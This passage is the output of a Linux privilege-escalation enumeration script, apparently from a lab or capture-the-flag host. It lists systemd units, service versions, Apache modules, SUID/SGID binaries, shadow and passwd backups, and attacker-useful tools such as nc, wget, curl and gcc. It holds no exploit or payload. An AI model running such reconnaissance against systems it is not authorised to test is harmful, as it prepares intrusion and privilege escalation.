-rw-r--r-- 1 root root  541 Jan 28  2018 kexec.target
-rw-r--r-- 1 root root  435 Jan 28  2018 local-fs-pre.target
-rw-r--r-- 1 root root  547 Jan 28  2018 local-fs.target
-rw-r--r-- 1 root root  445 Jan 28  2018 machine.slice
-rw-r--r-- 1 root root  532 Jan 28  2018 multi-user.target
-rw-r--r-- 1 root root  505 Jan 28  2018 network-online.target
-rw-r--r-- 1 root root  502 Jan 28  2018 network-pre.target
-rw-r--r-- 1 root root  521 Jan 28  2018 network.target
-rw-r--r-- 1 root root  554 Jan 28  2018 nss-lookup.target
-rw-r--r-- 1 root root  513 Jan 28  2018 nss-user-lookup.target
-rw-r--r-- 1 root root  394 Jan 28  2018 paths.target
-rw-r--r-- 1 root root  592 Jan 28  2018 poweroff.target
-rw-r--r-- 1 root root  417 Jan 28  2018 printer.target
-rw-r--r-- 1 root root  745 Jan 28  2018 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  655 Jan 28  2018 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  583 Jan 28  2018 reboot.target
-rw-r--r-- 1 root root  549 Jan 28  2018 remote-cryptsetup.target
-rw-r--r-- 1 root root  436 Jan 28  2018 remote-fs-pre.target
-rw-r--r-- 1 root root  522 Jan 28  2018 remote-fs.target
-rw-r--r-- 1 root root  492 Jan 28  2018 rescue.target
-rw-r--r-- 1 root root  540 Jan 28  2018 rpcbind.target
-rw-r--r-- 1 root root  442 Jan 28  2018 shutdown.target
-rw-r--r-- 1 root root  402 Jan 28  2018 sigpwr.target
-rw-r--r-- 1 root root  460 Jan 28  2018 sleep.target
-rw-r--r-- 1 root root  449 Jan 28  2018 slices.target
-rw-r--r-- 1 root root  420 Jan 28  2018 smartcard.target
-rw-r--r-- 1 root root  396 Jan 28  2018 sockets.target
-rw-r--r-- 1 root root  420 Jan 28  2018 sound.target
-rw-r--r-- 1 root root  503 Jan 28  2018 suspend.target
-rw-r--r-- 1 root root  393 Jan 28  2018 swap.target
-rw-r--r-- 1 root root  795 Jan 28  2018 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  767 Jan 28  2018 sys-kernel-config.mount
-rw-r--r-- 1 root root  710 Jan 28  2018 sys-kernel-debug.mount
-rw-r--r-- 1 root root  558 Jan 28  2018 sysinit.target
-rw-r--r-- 1 root root 1.4K Jan 28  2018 syslog.socket
-rw-r--r-- 1 root root  592 Jan 28  2018 system-update.target
-rw-r--r-- 1 root root  445 Jan 28  2018 system.slice
-rw-r--r-- 1 root root  704 Jan 28  2018 systemd-ask-password-console.path
-rw-r--r-- 1 root root  632 Jan 28  2018 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  564 Jan 28  2018 systemd-initctl.socket
-rw-r--r-- 1 root root 1.2K Jan 28  2018 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root  882 Jan 28  2018 systemd-journald.socket
-rw-r--r-- 1 root root  631 Jan 28  2018 systemd-networkd.socket
-rw-r--r-- 1 root root  657 Jan 28  2018 systemd-rfkill.socket
-rw-r--r-- 1 root root  490 Jan 28  2018 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  635 Jan 28  2018 systemd-udevd-control.socket
-rw-r--r-- 1 root root  610 Jan 28  2018 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  435 Jan 28  2018 time-sync.target
-rw-r--r-- 1 root root  445 Jan 28  2018 timers.target
-rw-r--r-- 1 root root  457 Jan 28  2018 umount.target
-rw-r--r-- 1 root root  432 Jan 28  2018 user.slice
-rw-r--r-- 1 root root  493 Jan 25  2018 ssh.service
-rw-r--r-- 1 root root  244 Jan 25  2018 ssh@.service
-rw-r--r-- 1 root root  216 Jan 16  2018 ssh.socket
-rw-r--r-- 1 root root  462 Jan 15  2018 mysql.service
-rw-r--r-- 1 root root  741 Dec 17  2017 accounts-daemon.service
-rw-r--r-- 1 root root  368 Dec 11  2017 irqbalance.service
-rw-r--r-- 1 root root  246 Nov 20  2017 apport-forward.socket
-rw-r--r-- 1 root root  142 Nov 20  2017 apport-forward@.service
-rw-r--r-- 1 root root  251 Nov 16  2017 cron.service
-rw-r--r-- 1 root root  505 Nov 15  2017 dbus.service
-rw-r--r-- 1 root root  106 Nov 15  2017 dbus.socket
-rw-r--r-- 1 root root  266 Aug 15  2017 ufw.service
-rw-r--r-- 1 root root  250 Aug 14  2017 ureadahead-stop.service
-rw-r--r-- 1 root root  242 Aug 14  2017 ureadahead-stop.timer
-rw-r--r-- 1 root root  401 Aug 14  2017 ureadahead.service
-rw-r--r-- 1 root root  330 Aug 10  2017 setvtrgb.service
-rw-r--r-- 1 root root  115 Apr 22  2017 acpid.path
-rw-r--r-- 1 root root  234 Apr 22  2017 acpid.service
-rw-r--r-- 1 root root  115 Apr 22  2017 acpid.socket
-rw-r--r-- 1 root root  309 Jun 17  2016 pollinate.service
-rw-r--r-- 1 root root  456 May 25  2016 ebtables.service
-rw-r--r-- 1 root root  188 Feb 24  2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Jul 16  2019 apache2-systemd.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Apr 12  2018 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 12  2018 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Apr 12  2018 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 12  2018 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Jan  3  2020 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 15 Jan  3  2020 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Jan  3  2020 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jan  3  2020 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jan  3  2020 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jan  3  2020 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 29 Apr 12  2018 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 Apr 12  2018 plymouth-quit.service -> ../plymouth-quit.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 28 Apr 12  2018 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 26 Apr 12  2018 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Jan  3  2020 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jan  3  2020 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jan  3  2020 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Jan  3  2020 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Jan  3  2020 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Jan  3  2020 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Jan  3  2020 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jan  3  2020 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jan  3  2020 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Jan  3  2020 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Jan  3  2020 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Jan  3  2020 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Jan  3  2020 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Jan  3  2020 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jan  3  2020 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jan  3  2020 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Jan  3  2020 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Jan  3  2020 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Jan  3  2020 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Jan  3  2020 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Jan  3  2020 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Jan  3  2020 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 Apr 12  2018 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Apr 12  2018 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jan  3  2020 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jan  3  2020 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jan  3  2020 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jan  3  2020 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Jan  3  2020 dbus.socket -> ../dbus.socket
lrwxrwxrwx 1 root root 25 Jan  3  2020 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jan  3  2020 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jan  3  2020 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Jan  3  2020 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Jan  3  2020 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Jan  3  2020 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jan  3  2020 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/user@.service.d:
total 4.0K
-rw-r--r-- 1 root root 125 Apr 20  2018 timeout.conf

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Apr 20  2018 debian.conf

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-generators:
total 228K
lrwxrwxrwx 1 root root  22 Jan  3  2020 netplan -> ../../netplan/generate
-rwxr-xr-x 1 root root 340 Oct 11  2018 postfix-instance-generator
-rwxr-xr-x 1 root root 23K Apr 20  2018 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 10K Apr 20  2018 systemd-debug-generator
-rwxr-xr-x 1 root root 31K Apr 20  2018 systemd-fstab-generator
-rwxr-xr-x 1 root root 14K Apr 20  2018 systemd-getty-generator
-rwxr-xr-x 1 root root 22K Apr 20  2018 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 10K Apr 20  2018 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 10K Apr 20  2018 systemd-rc-local-generator
-rwxr-xr-x 1 root root 10K Apr 20  2018 systemd-system-update-generator
-rwxr-xr-x 1 root root 31K Apr 20  2018 systemd-sysv-generator
-rwxr-xr-x 1 root root 14K Apr 20  2018 systemd-veritysetup-generator
-rwxr-xr-x 1 root root 19K Apr 16  2018 snapd-generator
-rwxr-xr-x 1 root root 11K Apr 12  2018 lvm2-activation-generator

/lib/systemd/system-sleep:
total 8.0K
-rwxr-xr-x 1 root root 219 Apr 17  2018 unattended-upgrades
-rwxr-xr-x 1 root root  92 Feb 22  2018 hdparm

/lib/systemd/system-shutdown:
total 4.0K
-rwxr-xr-x 1 root root 160 Mar  7  2018 mdadm.shutdown

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 951 Jan 28  2018 90-systemd.preset

/lib/systemd/network:
total 16K
-rw-r--r-- 1 root root 645 Jan 28  2018 80-container-host0.network
-rw-r--r-- 1 root root 718 Jan 28  2018 80-container-ve.network
-rw-r--r-- 1 root root 704 Jan 28  2018 80-container-vz.network
-rw-r--r-- 1 root root 412 Jan 28  2018 99-default.link


[00;33m### SOFTWARE #############################################[00m
[00;31m[-] Sudo version:[00m
Sudo version 1.8.21p2


[00;31m[-] MYSQL version:[00m
mysql  Ver 14.14 Distrib 5.7.28, for Linux (x86_64) using  EditLine wrapper


[00;31m[-] Apache version:[00m
Server version: Apache/2.4.29 (Ubuntu)
Server built:   2019-09-16T12:58:48


[00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[00;31m[-] Installed Apache modules:[00m
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php5_module (shared)
 reqtimeout_module (shared)
 rewrite_module (shared)
 security2_module (shared)
 setenvif_module (shared)
 status_module (shared)
 unique_id_module (shared)


[00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl


[00;31m[-] Installed compilers:[00m
ii  gcc                                   4:7.4.0-1ubuntu2.3                     amd64        GNU C compiler
ii  gcc-7                                 7.4.0-1ubuntu1~18.04.1                 amd64        GNU C compiler


[00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1676 Jan  7  2020 /etc/passwd
-rw-r--r-- 1 root root 805 Jan  3  2020 /etc/group
-rw-r--r-- 1 root root 581 Apr  9  2018 /etc/profile
-rw-r----- 1 root shadow 1082 Jan  8  2020 /etc/shadow


[00;31m[-] SUID files:[00m
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Mar 15  2018 /bin/umount
-rwsr-xr-x 1 root root 43088 Mar 15  2018 /bin/mount
-rwsr-xr-x 1 root root 44664 Jan 25  2018 /bin/su
-rwsr-xr-x 1 root root 64424 Mar  9  2017 /bin/ping
-rwsr-xr-x 1 root root 146128 Nov 30  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 22520 Mar 27  2018 /usr/bin/pkexec
-rwsr-xr-x 1 root root 37136 Jan 25  2018 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 59640 Jan 25  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 76496 Jan 25  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 149080 Jan 17  2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 44528 Jan 25  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 18448 Mar  9  2017 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40344 Jan 25  2018 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwsr-xr-x 1 root root 37136 Jan 25  2018 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75824 Jan 25  2018 /usr/bin/gpasswd
-rwsr-sr-x 1 root root 101208 Apr 16  2018 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14328 Mar 27  2018 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 80056 Apr  2  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Nov 15  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper


[00;31m[-] SGID files:[00m
-rwxr-sr-x 1 root mail 18424 Dec  3  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root mlocate 43088 Mar  1  2018 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 22808 Jan 25  2018 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 362640 Mar  4  2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 14328 Jan 17  2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 39352 Nov 16  2017 /usr/bin/crontab
-rwxr-sr-x 1 root tty 30800 Mar 15  2018 /usr/bin/wall
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwxr-sr-x 1 root shadow 71816 Jan 25  2018 /usr/bin/chage
-rwsr-sr-x 1 root root 101208 Apr 16  2018 /usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-r-xr-sr-x 1 root postdrop 14456 Oct 11  2018 /usr/sbin/postdrop
-r-xr-sr-x 1 root postdrop 22600 Oct 11  2018 /usr/sbin/postqueue
-rwxr-sr-x 1 root shadow 34816 Apr  5  2018 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 34816 Apr  5  2018 /sbin/pam_extrausers_chkpwd


[00;31m[+] Files with POSIX capabilities set:[00m
/usr/bin/mtr-packet = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 root root 5898 Apr 26  2018 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 100 Apr 11  2017 /etc/sos.conf
-rw-r--r-- 1 root root 2584 Feb  1  2018 /etc/gai.conf
-rw-r--r-- 1 root root 14867 Oct 13  2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 92 Apr  9  2018 /etc/host.conf
-rw-r--r-- 1 root root 513 Apr 26  2018 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2683 Jan 17  2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 1358 Jan 30  2018 /etc/rsyslog.conf
-rw-r--r-- 1 root root 4861 Feb 22  2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 191 Feb  7  2018 /etc/libaudit.conf
-rw-r--r-- 1 root root 350 Jan  3  2020 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 552 Apr  4  2018 /etc/pam.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 604 Aug 13  2017 /etc/deluser.conf
-rw-r--r-- 1 root root 812 Mar 24  2018 /etc/mke2fs.conf
-rw-r--r-- 1 root root 703 Aug 21  2017 /etc/logrotate.conf
-rw-r--r-- 1 root root 6920 Oct 27  2017 /etc/overlayroot.conf
-rw-r--r-- 1 root root 1260 Feb 25  2018 /etc/ucf.conf
-rw-r--r-- 1 root root 3028 Apr 26  2018 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Feb 28  2018 /etc/debconf.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 144 Jan  3  2020 /etc/kernel-img.conf
-rw-r--r-- 1 root root 403 Mar  1  2018 /etc/updatedb.conf


[00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/kibosh/.bash_history


[00;31m[-] Location and Permissions (if accessible) of .bak file(s):[00m
-rw------- 1 root shadow 1082 Jan  8  2020 /var/backups/shadow.bak
-rw------- 1 root root 805 Jan  3  2020 /var/backups/group.bak
-rw------- 1 root root 1676 Jan  7  2020 /var/backups/passwd.bak
-rw------- 1 root shadow 675 Jan  3  2020 /var/backups/gshadow.bak
-rw-r--r-- 1 root root 1440 Jan 13  2020 /etc/apache2/sites-available/def/default.bak


[00;31m[-] Any interesting mail in /var/mail:[00m
total 44
drwxrwsr-x  2 root mail  4096 Apr 12 10:45 .
drwxr-xr-x 14 root root  4096 Jan  3  2020 ..
-rw-------  1 root mail 30990 Apr 12 10:45 root


[00;33m### SCAN COMPLETE ####################################[00m
